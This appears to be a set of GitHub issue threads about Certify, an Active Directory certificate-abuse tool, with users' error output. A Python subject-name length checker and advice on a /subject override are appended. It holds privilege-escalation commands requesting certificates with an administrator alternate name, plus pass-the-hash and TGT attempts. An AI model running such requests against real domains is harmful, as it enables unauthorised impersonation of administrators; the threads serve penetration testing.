Now when I try to run Certify commands like certify cas, find, pkiobjects etc. I am getting errors.

The same is happening with other tools like SharpShares etc.

Can someone suggest what to do?

Can Certify be made Kerberos aware?

Hi. Thank you very much for your effort that went into all this research!

I am trying to abuse ESC6 from a non domain-joined machine. I am aware of the tools Certi and PKINITTools for Linux but at least Certi is not fully working at the moment. The other alternative is to use Certify on a non domain-joined Windows box, but for that to work Certify must be Kerberos aware. I can use Rubeus to request a TGT and pass that into RAM. When that is done I can execute for example the command "certutil -config "server2.adlab.local\adlab-SERVER2-CA" -getreg "policy\EditFlags"", meaning that command can be run outside of a domain and that certutil is Kerberos aware. Using Certify after requesting and passing a TGT using Rubeus results only in various crashes of Certify. For example:

PS C:\temp> .\certify.exe request /ca:server2.adlab.local\adlab-SERVER2-CA /template:User /altname:administrator

[*] Action: Request a Certificates
[*] Current user context : CLIENT2\localadmin1
[!] Unhandled Certify exception:

System.NullReferenceException: Object reference not set to an instance of an object.
at Certify.Cert.GetCurrentUserDN()
at Certify.Cert.CreateCertRequestMessage(String templateName, Boolean machineContext, String subjectName, String altName)
at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, Boolean install)
at Certify.Commands.Request.Execute(Dictionary`2 arguments)
at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

I have also tried the flags "/machine" and/or "/ca:[ADCS server IP]" but Certify still crashes.

Unable to cast object of type 'System.DirectoryServices.AccountManagement.GroupPrincipal' to type 'System.DirectoryServices.AccountManagement.UserPrincipal'

.\Certify.exe request /ca:LBABEPW114.REDACTED.com\REDACTED-Enterprise-Root-CA01 /template:REDACTEDCA01 /altname:REDACTEDUSER /domain:REDACTED.com /ldapserver:LBABEPW121.REDACTED.com

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : REDACTEDDOMAIN\REDACTEDUSER

[!] Unhandled Certify exception:

System.InvalidCastException: Unable to cast object of type 'System.DirectoryServices.AccountManagement.GroupPrincipal' to type 'System.DirectoryServices.AccountManagement.UserPrincipal'.
   at System.DirectoryServices.AccountManagement.UserPrincipal.FindByIdentity(PrincipalContext context, IdentityType identityType, String identityValue)
   at System.DirectoryServices.AccountManagement.UserPrincipal.get_Current()
   at Certify.Cert.GetCurrentUserDN()
   at Certify.Cert.CreateCertRequestMessage(String templateName, Boolean machineContext, String subjectName, String altName, String sidExtension)
   at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, String sidExtension, Boolean install)
   at Certify.Commands.Request.Execute(Dictionary`2 arguments)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)


Certify completed in 00:00:00.1875661

I have no idea where this is coming from. I tried with different Certify versions but keep getting this error.

Unable to find type [Certify.Program]

Hi,
by following https://github.com/GhostPack/Certify#sidenote-running-certify-through-powershell and without any AV active, when I try to execute the Main() program it returns:

$ [Certify.Program]::Main("find /vulnerable".Split())
Unable to find type [Certify.Program].
At line:1 char:1
+ [Certify.Program]::Main("find /vulnerable".Split())
+ ~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (Certify.Program:TypeName) [], RuntimeException
    + FullyQualifiedErrorId : TypeNotFound

The assembly seems loaded correctly in memory since I can tab through the attributes/methods etc but the "Program" does not seem to be callable.

Any hints on why this happens?

Tested on Win10 19042

`certify request` not working with ptt/pth

Awesome project! I hope the following issue can be fixed:

Similar to #13, it seems that the user context cannot be changed and is always the current user (no relevant parameters are supplied), which means we can't request a certificate with an obtained NTLM hash or TGT.

Tested on a domain-joined machine, I've tried PtH with Mimikatz and createnetonly with Rubeus; neither worked.

However, runas /netonly /user:domain\user cmd can run certify request successfully (assuming I've obtained the victim's plaintext password).

Please check this, thanks a lot.

The submission failed: Error Parsing Request The request subject name is invalid or too long. 0x80094001 (-2146877439 CERTSRV_E_BAD_REQUESTSUBJECT)

Getting this error while running:
certify.exe request /ca:CASERVER.thisisalongdomainlol.com\Issuing-External-CA /template:VulnTemplate /altname:Administrator

My Subject name according to certify is:
CN=TEST2\, Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com

Any ideas on how to deal with this error? It sounds like a legitimate issue for which you have to permit longer-than-64-character subject names on the AD CS server, according to this: https://www.open-a-socket.com/2014/07/24/the-request-subject-name-is-invalid-or-too-long/

Below is the full output with redacted info, this pentest is about to end but it might help the next person if this gets answered.

[*] Current user context    : thisisalongdomainlol\Contos
[*] No subject name specified, using current context as subject.

[*] Template                : VulnTemplate 
[*] Subject                 : CN=TEST2\,  Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com
[*] AltName                 : administrator

[*] Certificate Authority   : CASERVER.thisisalongdomainlol.com\Issuing-External-CA

[!] CA Response             : The submission failed: Error Parsing Request  The request subject name is invalid or too long. 0x80094001 (-2146877439 CERTSRV_E_BAD_REQUESTSUBJECT)
[!] Last status             : 0x80094001
[*] Request ID              : 0

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
abcde
-----END RSA PRIVATE KEY-----

[X] Error downloading certificate: CCertRequest::RetrievePending: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx


Certify completed in 00:00:08.5331567

Hopefully there is something that can be done rather than running a command on the AD CS server :/
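CERTSRV_E_BAD_REQUESTSUBJECT is the CA's response when it rejects the subject it was handed; with the default EnforceX500NameLengths setting, that includes any subject attribute longer than its RFC 5280 upper bound (64 characters for CN, OU and O, 128 for L and ST, 2 for C). Before touching the CA's registry it is worth checking which RDN, if any, actually exceeds a bound. The checker below is an added example, not Certify's or Microsoft's code: it splits a DN into RDNs while honouring the backslash-escaped comma that appears in the subject above, reports the longest value, and lists anything over bound. It is run against the subject printed in the report (copied verbatim) and against a constructed DN with a 70-character CN. The attribute-to-bound table is this example's selection from RFC 5280 Appendix A; domain components and other unlisted types are left unchecked. Certify's request command also accepts a /subject: override, so a shorter, valid subject can be supplied from the client without changing CA settings.

```python
"""Added example (not Certify's or Microsoft's code): split an X.500 subject into its
RDNs, honouring backslash escapes, and compare each value with the RFC 5280 upper
bounds that an AD CS CA enforces when EnforceX500NameLengths is on."""

# RFC 5280 Appendix A upper bounds (in characters) for the attribute types seen in
# AD CS subjects; DC and anything else not listed here is left unchecked.
UPPER_BOUNDS = {"CN": 64, "OU": 64, "O": 64, "L": 128, "ST": 128, "C": 2,
                "T": 64, "SERIALNUMBER": 64, "E": 255}

# The subject Certify printed in the report above, copied verbatim; the escaped
# comma inside the CN is what makes a naive split on "," wrong.
PAGE_DN = r"CN=TEST2\,  Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com"
# Constructed DN with a 70-character CN, past the 64-character bound.
LONG_DN = "CN=" + "A" * 70 + ", OU=Service Accounts, DC=example, DC=com"


def split_rdns(dn):
    """Return [(ATTRIBUTE, value), ...] for an RFC 4514-style string, unescaping backslashes."""
    rdns, buf, escaped = [], [], False
    for ch in dn:
        if escaped:                 # previous char was a backslash: take this one literally
            buf.append(ch)
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == ",":             # an unescaped comma separates RDNs
            rdns.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    rdns.append("".join(buf))
    pairs = []
    for rdn in rdns:
        attr, sep, value = rdn.strip().partition("=")
        if not sep:
            raise ValueError(f"RDN without '=': {rdn!r}")
        pairs.append((attr.strip().upper(), value.strip()))
    return pairs


def check_dn_lengths(dn):
    """Every RDN whose value exceeds its bound, as (attribute, value, length, bound)."""
    over = []
    for attr, value in split_rdns(dn):
        bound = UPPER_BOUNDS.get(attr)
        if bound is not None and len(value) > bound:
            over.append((attr, value, len(value), bound))
    return over


def longest_rdn(dn):
    """(attribute, length) of the longest value: the first thing to look at when a CA
    says the subject is 'invalid or too long'."""
    attr, value = max(split_rdns(dn), key=lambda av: len(av[1]))
    return attr, len(value)


if __name__ == "__main__":
    for label, dn in (("page subject", PAGE_DN), ("constructed subject", LONG_DN)):
        print(label, "longest RDN:", longest_rdn(dn), "over bound:", check_dn_lengths(dn))
```

For the subject from the report the longest value is the 20-character DC and nothing exceeds a bound, so the per-attribute length limit alone does not explain the rejection there; the constructed DN shows what a genuine over-bound CN looks like to the check.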
